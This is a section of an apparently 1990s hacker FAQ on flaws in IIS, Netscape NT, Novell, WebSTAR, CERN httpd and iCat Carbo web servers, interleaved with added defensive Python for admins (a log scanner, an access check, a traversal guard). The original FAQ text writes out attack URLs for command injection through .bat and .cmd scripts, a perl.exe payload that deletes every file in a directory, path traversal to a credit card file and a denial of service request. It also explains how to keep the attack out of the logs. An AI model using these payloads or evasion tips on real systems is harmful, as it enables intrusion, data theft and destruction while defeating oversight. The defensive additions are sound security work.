Fun with Other Web Servers
Section 04: Fun with Other Web Servers
04-1. What are some known vulnerabilities with Microsoft Internet Information Server?
There are a few, and they are deadly. If a site is running Microsoft Internet Information Server v1.0, the default installation leaves the server wide open. The example hack illustrated here assumes that the CGI directory is /scripts, there are no files called pfieffer.bat or pfieffer.cmd in the scripts directory, and the web server links .bat and .cmd files to cmd.exe. Just point your browser this way:
http://www.target.com/scripts/pfieffer.bat?&dir+c:\+?&time
or
http://www.target.com/scripts/pfieffer.cmd?&dir+c:\+?&time
Your browser will ask you to save a document. Start the save, and then click the cancel button to stop the download. The "time" command never terminates anyway, so the execution process is never completed. The server treats this as if you made a request and just cancelled, so the entire transaction isn't logged. There will be some info in some of the security logs, but no indication as to the machine the attack came from.
You can also execute a batch file by:
http://www.target.com/scripts/pfieffer.bat?&1STLINE+?&...+?&time
Just expand ... into a series of commands, make the last one the time command, and you can execute a batch file remotely with no logging of who you are. Remember, cancel the download, since the time command will never finish. I leave the commands you send to your own discretion ;-)
This works only if the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap
contains
.bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s
If this isn't present then the above hacks will not work, and the attempt will be logged. However, it IS present after initial installation.
Note: that was Microsoft Internet Information Server v1.0. Microsoft attempted to patch this problem. And according to the WWW Security FAQ the problem is solved. This is not the case as of June 1, 1996! If the server was downloaded after March 5, 1996 or has the .bat/.cmd patch installed, you can still do a bit of intruding. Let's say test.bat exists in /scripts:
@echo off
echo Content-type: text/plain
echo.
echo Hello World!
Now try this URL:
http://www.target.com/scripts/test.bat+%26dir+%26time+%26pfieffer.exe
The test.bat file must be present in /scripts for this to work, but it does work the same way as the previous methods (cancel the save, etc).
Another problem for IIS versions earlier than 1.0c is that the server is not chrooted: a series of ".." and "../" components in the request can lead you to retrieve any file off of the box.
A denial of service vulnerability exists using NT v4, SP1, and IIS v2.0.
Here's how to do it:
- telnet nt.thegnome.com 80 (assuming port 80 for httpd)
- GET ../..
Your fix? Reboot the server. Hopefully for you admins IIS 3.0 will address this concern.
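For admins, here is an added example (not part of the original FAQ) of what the request shapes described in 04-1 look like to a log scanner: a .bat or .cmd target whose argument list carries extra "&"-separated commands, a ".." traversal, and the bare "GET ../.." request. The log lines are constructed for the example and the rule names are my own. The caveat from above applies: a cancelled transaction may never reach the log, so a scanner like this only sees what the server chose to record, and a proxy log or packet capture in front of the server is the more reliable place to look.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format); they are not real
# traffic. The request targets mirror the URL shapes quoted in 04-1.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/1996:12:00:01 +0000] "GET /scripts/pfieffer.bat?&dir+c:\\+?&time HTTP/1.0" 200 0
10.0.0.5 - - [01/Jun/1996:12:00:02 +0000] "GET /scripts/test.bat+%26dir+%26time+%26pfieffer.exe HTTP/1.0" 200 512
10.0.0.6 - - [01/Jun/1996:12:00:03 +0000] "GET /scripts/../../some_file.txt HTTP/1.0" 200 2048
10.0.0.7 - - [01/Jun/1996:12:00:04 +0000] "GET /scripts/test.bat HTTP/1.0" 200 13
10.0.0.8 - - [01/Jun/1996:12:00:05 +0000] "GET /index.html HTTP/1.0" 200 1024
10.0.0.9 - - [01/Jun/1996:12:00:06 +0000] "GET ../.." 400 0
"""

# client  ident  user  [timestamp]  "METHOD target [version]"  ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+)(?: \S+)?"'
)

RULES = [
    # A .bat/.cmd target followed by a query or argument list that contains
    # "&": with the ScriptMap entry from 04-1 that "&" reaches cmd.exe as a
    # command separator. A legitimate "a=1&b=2" query to a .bat trips this
    # too, which is intended: such requests deserve a look either way.
    ("bat-cmd-command-injection", re.compile(r"\.(?:bat|cmd)[?\s].*&", re.I)),
    # Parent-directory components with either separator (the "not chrooted"
    # problem in IIS before 1.0c).
    ("dot-dot-traversal", re.compile(r"\.\.(?:[\\/]|$)")),
]


def parse_request(line):
    """Return (client, raw_target) for a log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("client"), m.group("target")


def classify(raw_target):
    """Return the names of the rules a request target trips.

    The target is decoded once ("+" to space, %26 to "&") so that the two
    encodings of the same trick from 04-1 are judged on the same text.
    """
    decoded = unquote_plus(raw_target)
    names = [name for name, rx in RULES if rx.search(decoded)]
    # The IIS 2.0 "GET ../.." denial of service sends no absolute path at all.
    if not decoded.startswith("/"):
        names.append("non-absolute-target")
    return names


def scan_log(text):
    """Return (client, rule, raw_target) for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        client, target = parsed
        for rule in classify(target):
            hits.append((client, rule, target))
    return hits


if __name__ == "__main__":
    for client, rule, target in scan_log(SAMPLE_LOG):
        print(f"{client:<10} {rule:<28} {target}")
```

Decoding exactly once before matching is the important design choice: the "%26" form and the "?&" form are the same request to cmd.exe, and a rule written against the raw log text would need one pattern per encoding.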
04-2. What are some known vulnerabilities with Netscape's NT Server?
There are a couple.
Netscape does not use the File Manager's extension association, so you cannot use the first .bat/.cmd attack from 04-1 on an NT server running Netscape. But you can try and execute a variation on the second attack. Assuming /cgi-bin is where the scripts are:
http://www.target.com/cgi-bin/test.bat?&dir
This executes test.bat and then gives you a directory listing.
The second one lies in the fact that until recently a Netscape tech note recommended putting PERL.EXE in the /cgi-bin directory. This would allow the site to call perl scripts from within /cgi-bin (remember, Netscape doesn't use the File Manager's extension association), but also allows you to send perl commands directly to the server. My favorite example in the WWW Security FAQ is:
http://www.target.com/cgi-bin/perl.exe?&-e+unlink+%3C*%3E
It erases all files in the current directory. Nasty.
04-3. What about WebSite and Purveyor?
WebSite 1.1b and earlier suffers from the same problems as Netscape does with DOS .bat files. Version 1.1c fixes this problem. WebSite 1.1e had a problem with quoting commands and passing them to a sample CMD file that took advantage of a buffer overflow condition. This was fixed in later releases.
Purveyor Server for NT doesn't seem to have any of these problems.
04-4. Is Novell's IntranetWare web server software vulnerable?
Novell's Web Server had a HUGE bug. The CGI scripts are Basic programs (yes you are about to hack a server using Basic!) and several are included with the server. One in particular, CONVERT.BAS, takes a file and converts it to HTML and then sends it to the user. Here's an example for www.target.com:
http://www.target.com/scripts/convert.bas?readme.txt
The README.TXT file is returned as HTML. Now here's the bug:
http://www.target.com/scripts/convert.bas?../../any_file_on_sys_volume
This is supposedly corrected in the version that ships with Netware 4.11, but a number of sites, including Novell's office in Japan, still have the bug and you can still access any file on volume SYS as a text file.
04-5. What about WebSTAR for the Mac?
Try adding /M_A_C_H_T_T_P_V_E_R_S_I_O_N to any URL on a WebSTAR server and it will give you info like this:
WebSTAR, Copyright ©1995 Chuck Shotton,
Portions ©1995 StarNine Technologies, Inc. and its Licensors. All rights reserved.
PowerPC (CW) version
totalCon 343, maxCon 30, listening 29, current 1, high 8, busy 0, denied 0, timeout 0, maxMem
1140640, currMem 1117024, minMem 1090208, bytesSent 1218888, port 80, maxTimeout 300,
verboseMessages false, disableLogging false, hideWindow false,
refuseConnections false, upSince
07/11/96:10:48, version 1.2.5(PowerPC (CW))
The latest version should have this fixed. While it doesn't seem very interesting, the connection to get this is not logged, which allows psychotics to use it as a denial-of-service attack.
Why is it even there? It has been speculated that the author had intended to "check out" and see how busy his code was once it was installed.
04-6. Does CERN's httpd have any vulnerabilities?
CERN does access restriction using either IP addresses or hostnames. The pattern for both is value.value.value.value, that is 205.42.*.* or *.spy.spook.gov. Since they use some of the same code in their checking, under certain conditions a hole opens. You could spoof or supply a hostname that matches the IP address mask and allows access.
If the CERN httpd server is a proxy on a gateway machine and you use IP address masks to limit access to the proxy, an attacker could use the proxied service to access internal machines. Since you are allowing port 80 traffic in, your firewall becomes useless.
Admins, a patch should be available from http://softway.com.au/misc/cern.html, and hackers, this is the only proxy I am aware of that does this. It certainly seems possible that other proxy software (and not just web services) might be impacted.
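For admins, an added example (my own code, not CERN httpd's) of the mistake described in 04-6 and of the check that avoids it. The two-rule access list is constructed from the patterns quoted above. naive_allowed runs one glob match over whatever string names the client, which is how a hostname can satisfy an address mask; strict_allowed tags each rule with the kind of identity it may match, checks address rules only against the socket peer address, and checks hostname rules only against a name the server has resolved from that address and confirmed by a forward lookup. The same separation applies when the list guards a proxy.

```python
import fnmatch
import ipaddress

# Constructed access list in the style of the two patterns quoted in 04-6.
# Each rule is tagged with the kind of identity it is allowed to match.
ACL = [
    ("ip", "205.42.*.*"),
    ("host", "*.spy.spook.gov"),
]


def is_ipv4_literal(text):
    """True if *text* is a well-formed dotted-quad address."""
    try:
        ipaddress.IPv4Address(text)
        return True
    except ValueError:
        return False


def naive_allowed(acl, presented):
    """The shortcut 04-6 warns about: one glob match over whatever string
    names the client, address or hostname. "205.42.*.*" then matches the
    hostname 205.42.attacker.example as readily as the address 205.42.1.1."""
    return any(fnmatch.fnmatchcase(presented, pattern) for _, pattern in acl)


def ip_matches(mask, peer_ip):
    """Octet-by-octet match of a dotted mask against a validated IPv4 address."""
    if not is_ipv4_literal(peer_ip):
        return False
    parts = mask.split(".")
    if len(parts) != 4:
        raise ValueError(f"bad IP mask: {mask!r}")
    return all(p == "*" or p == octet for p, octet in zip(parts, peer_ip.split(".")))


def host_matches(pattern, hostname):
    """Glob match for a hostname rule; an address literal never satisfies it."""
    if is_ipv4_literal(hostname):
        return False
    return fnmatch.fnmatchcase(hostname.lower(), pattern.lower())


def strict_allowed(acl, peer_ip, verified_hostname=None):
    """Address rules see only the socket peer address. Hostname rules see only
    a name resolved from that address and confirmed by a forward lookup
    (passed in here as *verified_hostname*, or None when the lookups did not
    agree). Nothing the client supplies is matched against the wrong kind."""
    for kind, pattern in acl:
        if kind == "ip" and ip_matches(pattern, peer_ip):
            return True
        if kind == "host" and verified_hostname and host_matches(pattern, verified_hostname):
            return True
    return False
```

Failing closed when the reverse and forward lookups disagree (verified_hostname is None) is what keeps the hostname rule from trusting whatever name the client side's DNS chooses to return.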
04-7. What is the iCat Carbo Server bug?
iCat Carbo Server is a program used to develop interactive shopping catalogs for the web. Version 3.0.0 has a bug that allows you to look at any file on the server.
Try this type of url:
http://host/carbo.dll?icatcommand=..\..\winnt\creditcards&catalogname=catalog
You get the idea.
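For admins, the file-disclosure bugs in this section (the un-chrooted IIS of 04-1, CONVERT.BAS in 04-4 and carbo.dll in 04-7) share one root cause: a client-supplied name is joined onto a directory without checking that the result still lies inside it. The following is an added example of that check (my own code, not taken from any of those products); the document root and file names are constructed, and the function expects a name that has already been URL-decoded exactly once.

```python
import posixpath


class TraversalError(ValueError):
    """Raised when a requested name would resolve outside the document root."""


def resolve_document(root, requested):
    """Map a client-supplied relative name onto a file under *root*.

    *requested* must already be URL-decoded exactly once. Both "/" and "\\"
    are treated as separators, because cmd.exe, NetWare and the Win32 file
    APIs all accept either; a check that knows only one of them is exactly
    the gap that "..\\..\\" in the carbo.dll example walks through.
    """
    if "\x00" in requested:
        # C runtimes stop at the first NUL, so a name could be checked as one
        # string and opened as a shorter one.
        raise TraversalError("NUL byte in requested name")
    cleaned = requested.replace("\\", "/")
    if cleaned.startswith("/") or (len(cleaned) > 1 and cleaned[1] == ":"):
        raise TraversalError(f"absolute path not allowed: {requested!r}")
    # Collapse "a/./b", "a//b" and "a/../b" before deciding where it lands;
    # "../" that survives normalisation points above the root.
    normalised = posixpath.normpath(cleaned)
    if normalised == ".." or normalised.startswith("../"):
        raise TraversalError(f"escapes document root: {requested!r}")
    return posixpath.join(root, normalised)


def is_within_root(root, requested):
    """True if *requested* resolves to a file under *root*, False otherwise."""
    try:
        resolve_document(root, requested)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    root = "/srv/www/docs"  # constructed document root
    for name in ("readme.txt", "sub/../readme.txt", "../../any_file_on_sys_volume",
                 "..\\..\\winnt\\creditcards"):
        print(f"{name!r:<36} -> {'ok' if is_within_root(root, name) else 'REJECTED'}")
```

Rejecting rather than silently clamping is deliberate: a request that normalises to "../x" is not a user typo, and an error plus a log line is worth more than quietly serving the root. On Windows a final check against the real, canonical path is still advisable, since short 8.3 names and trailing dots or spaces can make two spellings name one file.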